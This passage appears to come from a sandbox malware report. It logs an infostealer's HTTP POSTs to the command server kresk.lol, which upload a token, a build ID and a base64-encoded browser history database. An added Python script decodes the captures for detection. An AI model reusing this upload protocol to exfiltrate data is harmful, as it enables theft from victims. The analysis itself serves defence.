                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:53 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 16:04:55 UTC | 158 bytes | IN | HTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:04:55 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
2024-12-04 16:04:55 UTC | 12 bytes | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2\r\nok\r\n0\r\n\r\n (chunked transfer encoding: one 2-byte chunk carrying "ok", then the zero-length terminating chunk; the sandbox's ASCII rendering drops the CR/LF pairs, which is why it reads "2ok0")


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49776 | 159.69.102.165 | 443 | 8080 | C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-04 16:04:54 UTC | 316 bytes | OUT | POST / HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----QQIEKNGVAAAAIE3O8Q16
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                      Host: kresk.lol
                                                                                                                                                                      Content-Length: 493
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
2024-12-04 16:04:54 UTC | 493 bytes | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 36 0d 0a 43 6f 6e 74
Data Ascii (CR/LF pairs restored from the raw bytes; the sandbox shows only the first 256 bytes of the 493-byte body, so the third part is cut off after "Cont"):
------QQIEKNGVAAAAIE3O8Q16
Content-Disposition: form-data; name="token"

6aeb446e65e3de6e8bd63f79e11152e9
------QQIEKNGVAAAAIE3O8Q16
Content-Disposition: form-data; name="build_id"

d32ef9a4f5283c4820a5915619c67f72
------QQIEKNGVAAAAIE3O8Q16
Cont
2024-12-04 16:04:55 UTC | 158 bytes | IN | HTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:04:55 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
2024-12-04 16:04:55 UTC | 12 bytes | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2\r\nok\r\n0\r\n\r\n (chunked transfer encoding: one 2-byte chunk carrying "ok", then the zero-length terminating chunk; rendered as "2ok0" once the CR/LF pairs are dropped)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49782 | 159.69.102.165 | 443 | 8080 | C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-04 16:04:58 UTC | 319 bytes | OUT | POST / HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----DBAI5X4OZU3EUASRQ16P
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                      Host: kresk.lol
                                                                                                                                                                      Content-Length: 169765
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
2024-12-04 16:04:58 UTC | 16355 bytes | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 44 42 41 49 35 58 34 4f 5a 55 33 45 55 41 53 52 51 31 36 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 49 35 58 34 4f 5a 55 33 45 55 41 53 52 51 31 36 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 49 35 58 34 4f 5a 55 33 45 55 41 53 52 51 31 36 50 0d 0a 43 6f 6e 74
Data Ascii (CR/LF pairs restored from the raw bytes; the sandbox shows only the first 256 bytes of this chunk, so the third part is cut off after "Cont"):
------DBAI5X4OZU3EUASRQ16P
Content-Disposition: form-data; name="token"

6aeb446e65e3de6e8bd63f79e11152e9
------DBAI5X4OZU3EUASRQ16P
Content-Disposition: form-data; name="build_id"

d32ef9a4f5283c4820a5915619c67f72
------DBAI5X4OZU3EUASRQ16P
Cont
                                                                                                                                                                      2024-12-04 16:04:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 16:04:58 UTC | 16355 bytes | OUT | Data Raw: 55 67 51 6b 39 50 54 45 56 42 54 69 42 45 52 55 5a 42 56 55 78 55 49 45 5a 42 54 46 4e 46 49 45 35 50 56 43 42 4f 56 55 78 4d 4b 56 41 45 42 68 63 72 4b 77 46 5a 64 47 46 69 62 47 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 46 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 4e 78 62 47 6c 30 5a 56 39 7a 5a 58 46 31 5a 57 35 6a 5a 53 68 75 59 57 31 6c 4c 48 4e 6c 63 53 6d 42 66 77 4d 48 46 78 55 56 41 59 4e 68 64 47 46 69 62 47 56 31 63 6d 78 7a 64 58 4a 73 63 77 52 44 55 6b 56 42 56 45 55 67 56 45 46 43 54 45 55 67 64 58 4a 73 63 79 68 70 5a 43 42 4a 54 6c 52 46 52 30 56 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 49 45 46 56 56 45 39 4a 54 6b 4e 53 52 55 31 46 54
Data Ascii: UgQk9PTEVBTiBERUZBVUxUIEZBTFNFIE5PVCBOVUxMKVAEBhcrKwFZdGFibGVzcWxpdGVfc2VxdWVuY2VzcWxpdGVfc2VxdWVuY2UFQ1JFQVRFIFRBQkxFIHNxbGl0ZV9zZXF1ZW5jZShuYW1lLHNlcSmBfwMHFxUVAYNhdGFibGV1cmxzdXJscwRDUkVBVEUgVEFCTEUgdXJscyhpZCBJTlRFR0VSIFBSSU1BUlkgS0VZIEFVVE9JTkNSRU1FT
This fragment is base64 text, not padding: the sandbox chunk boundary falls inside a 4-character base64 group, so after dropping the leading "Ug" it decodes to bytes containing "BOOLEAN DEFAULT FALSE NOT NULL)", "CREATE TABLE sqlite_sequence(name,seq)" and "CREATE TABLE urls(id INTEGER PRIMARY KEY AUTOINCREME", i.e. the schema page of a SQLite database with a Chromium-style browser History "urls" table, uploaded base64-encoded inside this 169765-byte multipart body.
2024-12-04 16:05:00 UTC | 158 bytes | IN | HTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:05:00 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
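The sessions above are the stealer's upload protocol as the sandbox captured it: each POST to kresk.lol carries a multipart/form-data body whose first two parts are a fixed "token" and "build_id", followed by further parts the dump truncates, and the server answers with a chunked "ok". The script below is an added example, not part of the Joe Sandbox report or of the sample itself: it rebuilds bytes from the report's "Data Raw" hex dumps, extracts the multipart fields (skipping the part the 256-byte dump cuts off), decodes the chunked reply, and realigns and decodes the base64 fragment from session 19 to recover the SQLite schema strings it carries. All sample inputs are copied from the dumps above and labelled as such; the function names are mine.

```python
"""Parse the stealer's C2 upload as captured in the report (added example)."""
import base64
import re

# Constructed sample: the session-18 POST body copied from the report's
# "Data Raw" hex dump. Joe Sandbox shows only the first 256 bytes of the
# 493-byte body, so the third multipart part is cut off after "Cont".
CONTENT_TYPE = "multipart/form-data; boundary=----QQIEKNGVAAAAIE3O8Q16"
BODY_HEX = """
2d 2d 2d 2d 2d 2d 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 36 0d 0a
43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20
6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a
36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a
2d 2d 2d 2d 2d 2d 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 36 0d 0a
43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20
6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a
64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a
2d 2d 2d 2d 2d 2d 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 36 0d 0a
43 6f 6e 74
"""
# Constructed sample: the 12-byte chunked response body from the report.
RESPONSE_HEX = "32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a"
# Constructed sample: the base64 fragment shown for the 169765-byte upload in
# session 19; the sandbox chunk boundary falls inside a 4-character group.
B64_FRAGMENT = (
    "UgQk9PTEVBTiBERUZBVUxUIEZBTFNFIE5PVCBOVUxMKVAEBhcrKwFZdGFibGVzcWxpdGVfc2VxdWVuY2Vz"
    "cWxpdGVfc2VxdWVuY2UFQ1JFQVRFIFRBQkxFIHNxbGl0ZV9zZXF1ZW5jZShuYW1lLHNlcSmBfwMHFxUVAYNh"
    "dGFibGV1cmxzdXJscwRDUkVBVEUgVEFCTEUgdXJscyhpZCBJTlRFR0VSIFBSSU1BUlkgS0VZIEFVVE9JTkNSRU1FT"
)


def hexdump_to_bytes(dump: str) -> bytes:
    """Turn a 'Data Raw' style hex dump (space/newline separated) into bytes."""
    return bytes.fromhex(dump)


def boundary_from_content_type(content_type: str) -> str:
    """Pull the boundary parameter (quoted or bare) out of a Content-Type value."""
    m = re.search(r'boundary=("?)([^";]+)\1', content_type)
    if not m:
        raise ValueError("no multipart boundary in Content-Type")
    return m.group(2)


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Return {field name: value} for every complete form part.

    A part the dump truncates (no blank line after its headers) is skipped
    instead of raising, so a partial capture still yields the leading fields.
    """
    delimiter = b"--" + boundary.encode()
    fields = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):        # closing delimiter "--boundary--"
            break
        head, sep, value = part.partition(b"\r\n\r\n")
        if not sep:                       # headers cut off: truncated part
            continue
        m = re.search(rb'name="([^"]*)"', head)
        if m:
            fields[m.group(1).decode()] = value.removesuffix(b"\r\n")
    return fields


def decode_chunked(raw: bytes) -> bytes:
    """Decode an HTTP/1.1 chunked body: hex size line, data, CRLF, ..., 0 chunk."""
    out, pos = b"", 0
    while True:
        eol = raw.index(b"\r\n", pos)
        size = int(raw[pos:eol].split(b";")[0], 16)   # ignore chunk extensions
        pos = eol + 2
        if size == 0:
            return out
        out += raw[pos:pos + size]
        pos += size + 2                               # skip chunk data + CRLF


def decode_misaligned_base64(fragment: str, marker: bytes = b"CREATE TABLE"):
    """Decode a base64 fragment whose start is not on a 4-character boundary.

    Tries the four possible alignments and returns (offset, decoded bytes)
    for the one that yields the expected marker, or (None, b"") if none does.
    """
    for offset in range(4):
        s = fragment[offset:]
        s = s[: len(s) - len(s) % 4]        # drop the incomplete trailing group
        try:
            decoded = base64.b64decode(s, validate=True)
        except ValueError:                  # binascii.Error is a ValueError
            continue
        if marker in decoded:
            return offset, decoded
    return None, b""


def summarize_session() -> dict:
    """Run the three steps over the sample data and collect the results."""
    fields = parse_multipart(hexdump_to_bytes(BODY_HEX),
                             boundary_from_content_type(CONTENT_TYPE))
    reply = decode_chunked(hexdump_to_bytes(RESPONSE_HEX))
    offset, blob = decode_misaligned_base64(B64_FRAGMENT)
    # Printable runs starting with CREATE TABLE are the SQLite schema entries.
    schema = re.findall(rb"CREATE TABLE [^\x00-\x1f\x7f-\xff]+", blob)
    return {"fields": fields, "reply": reply, "b64_offset": offset,
            "schema": [s.decode() for s in schema]}


if __name__ == "__main__":
    for key, value in summarize_session().items():
        print(key, value)
```

The same two values ("token" and "build_id") open every POST in sessions 18 to 20, so on a network sensor they are a better pivot than the per-request boundary string, which changes each time; the base64 realignment step is what makes the sandbox's 16355-byte chunk dumps usable without the full capture.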


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49786 | 159.69.102.165 | 443 | 8080 | C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
Timestamp | Bytes transferred | Direction | Data
